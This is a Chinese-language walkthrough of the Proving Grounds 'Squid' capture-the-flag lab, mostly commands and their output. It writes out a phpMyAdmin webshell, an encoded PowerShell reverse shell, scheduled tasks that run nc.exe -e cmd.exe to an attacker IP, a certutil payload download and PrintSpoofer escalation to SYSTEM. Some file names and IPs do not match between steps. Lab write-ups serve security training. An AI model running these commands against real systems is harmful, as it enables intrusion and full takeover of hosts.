Difficulty

Easy

Scan

autorecon 192.168.212.189

OS: Windows 10, Windows Server 2019, Windows Server 2016
OS version: '10.0'
OS release: '1809'
OS build: '17763'

[*] msrpc found on tcp/135.
    msrpc

[*] netbios-ssn found on tcp/139.
[*] microsoft-ds found on tcp/445.
    SMB  3.0

[*] http-proxy found on tcp/3128.
    squid/4.14 http-proxy
    Squid-Web-Proxy-Cache[4.14]
    Via-Proxy[1.1 SQUID (squid/4.14)], X-Cache[SQUID]


[*] msrpc found on tcp/49666.
[*] msrpc found on tcp/49667.

Foothold

搜索 squid 4.14 exploit, 找不到可以利用的expolit code
设置代理 192.168.212.189:3128, 再访问192.168.212.189 不通

设置代理后，重新nmap扫描端口，没有任何输出

export all_proxy=http://192.168.212.189:3128

nmap -Pn -sT 192.168.212.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 23:23 CST

smb匿名登录失败，尝试administrator常见弱密码无法成功，使用hydra 爆破smb没有结果

hydra -L /usr/share/wordlists/dirb/others/names.txt -P /usr/share/wordlists/rockyou.txt smb://192.168.212.189
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-19 21:08:23
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 123462242193 login tries (l:8607/p:14344399), ~123462242193 tries per task
[DATA] attacking smb://192.168.212.189:445/
[ERROR] invalid reply from target smb://192.168.212.189:445/

几个小时没有进展，查看hits，确实是需要通过http-proxy再次做信息收集

原来是export proxy这种方式nmap无法生效，使用nmap –proxies参数再次做信息收集，还是没有收获，看提示是在8080端口，以后遇到相同的情况写脚本来扫？ curl --proxy http://ip:port http://ip:port

nmap -Pn -sT 192.168.212.189 -vv -p8080 --proxies http://192.168.212.189:3128
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-20 00:05 CST
Initiating Parallel DNS resolution of 1 host. at 00:05
Completed Parallel DNS resolution of 1 host. at 00:06, 2.56s elapsed
Initiating Connect Scan at 00:06
Scanning 192.168.212.189 [1 port]
Completed Connect Scan at 00:06, 2.00s elapsed (1 total ports)
Nmap scan report for 192.168.212.189
Host is up, received user-set.
Scanned at 2025-02-20 00:06:01 CST for 2s

PORT     STATE    SERVICE    REASON
8080/tcp filtered http-proxy no-response

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 4.58 seconds

gobuster目录扫描，发现phpsysinfo、adminer、phpmyadmin三个路径，浏览器设置代理后，也可以直接看到这三个页面的入口, 除此之外还有phpinfo

gobuster dir -w /usr/share//wordlists/dirb/big.txt -u http://192.168.212.189:8080 -t 40 --proxy http://192.168.212.189:3128
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.212.189:8080
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share//wordlists/dirb/big.txt
[+] Negative Status codes:   404
[+] Proxy:                   http://192.168.212.189:3128
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/adminer              (Status: 301) [Size: 337] [--> http://192.168.212.189:8080/adminer/]
/phpmyadmin           (Status: 301) [Size: 340] [--> http://192.168.212.189:8080/phpmyadmin/]
/phpsysinfo           (Status: 301) [Size: 340] [--> http://192.168.212.189:8080/phpsysinfo/]
/prn                  (Status: 403) [Size: 292]
/secci�              (Status: 403) [Size: 292]
Progress: 20469 / 20470 (100.00%)

搜索wampserver 3.2.3版本漏洞，找到 https://www.exploit-db.com/exploits/50094，测试之后发现无法利用。

进入 http://192.168.212.189:8080/phpsysinfo/index.php?disp=bootstrap, 展示系统信息, 系统是windows server 2019，后面提权可能有用

http://192.168.212.189:8080/adminer/ adminer 版本号4.7.7 搜索已知漏洞，无结果；尝试root/admin账号常见的弱密码无法登录，手工检测sql注入无结果。

phpadmin http://192.168.212.189:8080/phpmyadmin/ 简单sql注入无结果，用户名root，无密码登录成功。

先检查了一下user表，没有和系统用户有关的账号信息

检查下文件写入权限， <a data-lark-is-custom="true" href="http://192.168.212.189:8080/phpmyadmin/url.php?url=https://dev.mysql.com/doc/refman/5.5/en/select.html">SELECT</a>`` @@secure_file_priv 结果为空表示可以写入任务目录，为null不允许写入

接下来的思路就是写webshell了，需要先知道当前server的绝对路径

首页的phpinfo进入可以看到当前路径 C:/wamp/www/

接下来就写webshell，反弹shell了

1	select '<? php system(_REQUEST("cmd"); ?>' into outfile 'C:/wamp/www/r.php'

whoami 发现是system
curl --proxy http://192.168.212.189:3128 http://192.168.212.189:8080/shell11.php?cmd=whoami
nt authority\system

反弹shell
curl --proxy http://192.168.212.189:3128 http://192.168.212.189:8080/shell11.php?cmd=powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMwA0ACIALAA4ADAAOAAwACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
nt authority\system

rlwrap nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.45.234] from (UNKNOWN) [192.168.212.189] 50808
id
PS C:\wamp\www> whoami
nt authority\system

eacalation

官方walkthrough中，反弹shell之后得到的是local service的shell，offsec pg lab的有很多已经更新了，但是walkThrough没有更新，可以确认的是都变得更简单了。

提权方法记录如下:

查看权限，发现有些权限缺失了，通过文章发现 local service or network service被配置为受限的权限 restricted set of privileges *, *完整的权限可以通过 scheduled task获取

PS C:\wamp\www>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

PS C:\wamp\www> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.118.23 4444 -e cmd.exe`""

PS C:\wamp\www> Register-ScheduledTask -Action $TaskAction -TaskName "GrantPerm"

TaskPath                                       TaskName                          State   
--------                                       --------                          -----   
\                                              GrantPerm                         Ready   

PS C:\wamp\www> Start-ScheduledTask -TaskName "GrantPerm"

kali 获取反弹shell

Ncat: Connection from 192.168.120.223.
Ncat: Connection from 192.168.120.223:50828.
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                        State   
============================= ================================== ========
SeAssignPrimaryTokenPrivilege Replace a process level token      Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process Disabled
SeSystemtimePrivilege         Change the system time             Disabled
SeAuditPrivilege              Generate security audits           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking           Enabled 
SeCreateGlobalPrivilege       Create global objects              Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set     Disabled
SeTimeZonePrivilege           Change the time zone               Disabled

C:\Windows\system32>

至此权限中还是没有 SeImpersonatePrivilege，但是可以通过创建一个 ScheduledTaskPrincipal 来获取, 可以在其中指定 seimpersonatePrivilege在必需的privilege属性中

# Create a list of privileges
PS C:\Windows\system32> [System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"

# Create a Principal for the task 
PS C:\Windows\system32> $TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs

# Create an action for the task 
PS C:\Windows\system32> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.118.23 4444 -e cmd.exe`""

# Create the task
PS C:\Windows\system32> Register-ScheduledTask -Action $TaskAction -TaskName "GrantAllPerms" -Principal $TaskPrincipal

TaskPath                                       TaskName                          State   
--------                                       --------                          -----   
\                                              GrantAllPerms                     Ready   

# Start the task
PS C:\Windows\system32> Start-ScheduledTask -TaskName "GrantAllPerms"

kali监听新的4444端口，发现已经有了 SeImpersonatePrivilege权限

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 4444                 
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 192.168.120.223.
Ncat: Connection from 192.168.120.223:50883.
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Windows\system32>

然后就可以从 https://github.com/itm4n/PrintSpoofer下载PrintSpoofer.exe来提权了

C:\wamp\www>certutil -urlcache -f http://192.168.118.23/PrintSpoofer64.exe PrintSpoofer64.exe
certutil -urlcache -f http://192.168.118.23/PrintSpoofer64.exe PrintSpoofer64.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

# Checking SeImpersonatePrivilege abuse
C:\wamp\www>PrintSpoofer64.exe -i -c "cmd /c whoami"
PrintSpoofer64.exe -i -c "cmd /c whoami"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
nt authority\system

# Creating a new SYSTEM process in our current console
C:\wamp\www>PrintSpoofer64.exe -i -c "cmd /c cmd.exe"
PrintSpoofer64.exe -i -c "cmd /c cmd.exe"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2300]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

反思

基础工具使用还是不够熟练

临渊羡鱼

Proving Grounds Practice - Squid

Difficulty

Scan

Foothold

eacalation

反思